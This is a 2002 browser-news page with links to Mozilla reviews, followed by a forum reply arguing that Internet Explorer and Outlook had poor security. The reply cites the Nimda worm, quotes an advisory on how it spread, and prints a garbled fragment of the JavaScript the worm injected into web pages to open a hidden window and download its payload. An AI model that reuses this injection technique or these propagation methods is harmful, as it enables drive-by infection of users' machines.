Comparatively Speaking...

Monday July 1st, 2002

Linux Online recently compared the major Linux browsers, including the Mozilla-based trio of Mozilla 1.0, Netscape 6.2 and Galeon. Reviewer Michael J Jordan praises Mozilla's stability, tabbed browsing, rendering and customisation.

As mentioned by fondacio on our forums, the International Herald and Tribune took a look at Mozilla, Opera and NeoPlanet (note that the site doesn't seem to work in some builds of Mozilla). Reviewer Lee Dembart says that "Mozilla is impressive and has it all over Opera." He especially likes the ability to block pop-ups, tabbed browsing and pipelining.

UPDATE! tuxracer writes: "I've put up a browser comparison list, comparing various features that affect usability and W3C standards compliance. It compares Mozilla 1.0, Netcaptor 7.01, Internet Explorer 6.0 (Windows), and Internet Explorer 5.x (Mac)."

#84 Re: Re: Re: Re: Re: Re: Re: Re: Re: Re: Not my exp

by asa <>

Sunday July 7th, 2002 10:55 PM

You are replying to this message

How then did your system get infected? Did you or anyone you know get NIMDA? Here's how NIMDA worked:

1. from client to client via email 2. from client to client via open network shares 3. from web server to client via browsing of compromised web sites 4. from client to web server via active scanning for and exploitation of various Microsoft IIS 4.0 / 5.0 directory traversal vulnerabilities (VU#111677 and CA-2001-12) 5. from client to web server via scanning for the back doors left behind by the "Code Red II" (IN-2001-09), and "sadmind/IIS" (CA-2001-11) worms <…es/CA200126_FA200126.html>

"... Note that any x86 email software that uses a vulnerable version of Internet Explorer to display HTML messages [1] will automatically execute the malicious attachment if the message is merely opened or previewed [4]. This happens because the worm MIME encodes the attachment to take advantage of a known vulnerability called "Automatic Execution of Embedded MIME Types" (see CERT advisory CA-2001-06 [1]). Microsoft's Outlook and Outlook Express are the most typical victims. Every ten days the worm regenerates its list of email addresses and sends itself to all....If a vulnerable version of Internet Explorer is used to view or preview the message, the malicious attachment will be executed without the user's knowledge. Unpatched IE 5.01 and IE 5.5 without SP2 are vulnerable. Further, IE 6 can be vulnerable under specific conditions. See the PROTECT section for further information. Mail clients that are not using vulnerable versions of IE can also facilitate infection, but in those cases the user must double-click the attachment to execute the virus....Once Nimda has infected a system, it searches the local hard drives for .HTML, .ASP, and .HTM files [3]. The worm also looks for files with INDEX, MAIN, or DEFAULT in the name [4]. If any such files are found, the worm creates a multi-part MIME-encoded copy of itself named README.EML in the same directory. Further, the worm adds a small piece of JavaScript to each one of the found files. The JavaScript, shown below, contains instructions to open a new browser window and download README.EML to the client. As described in the section regarding email propagation, if the client happens to be a vulnerable IE browser, the malicious program will be automatically executed and the machine viewing the web page will become infected. <html><script language="JavaScript">"readme.eml", null, "resizable=no,top=6000,left=6000")</script></html> The author of Nimda cleverly chose to write the JavaScript such that the new browser window will be opened outside the viewable desktop area so that the user may not even notice it. Browsers other than IE may force the window into the viewable area, and will not automatically execute README.EML." <…es&hl=en&ie=UTF-8>

NIMDA, one of the costliest and most widespread worms in the history of MS Windows computing (more than 1.2 million infections in the first couple weeks it existed with as many as 120,000 infections in a single day <> that sounds considerably more widespread than the 42 thousand fatality car wrecks in all of that year), didn't require any user execution. If you got it you probably got it by simply opening an email message or browsing a web page. That Microsoft offered patches to IE/Outlook to defend against this massive attack is an admission of inadequate security in their vulnerable applications. I didn't get infected by NIMDA while a good portion of my friends and family did. I attribute that to not using applications with inadequate security. Do you have confidence that there are not going to be additional attacks on MS products of this scale or larger? I don't. All of the major anti-virus software packages defend against NIMDA. I'm of the opinion, however, that a user shouldn't have to pay extra money and install extra software because of an inadequate email or web browsing application.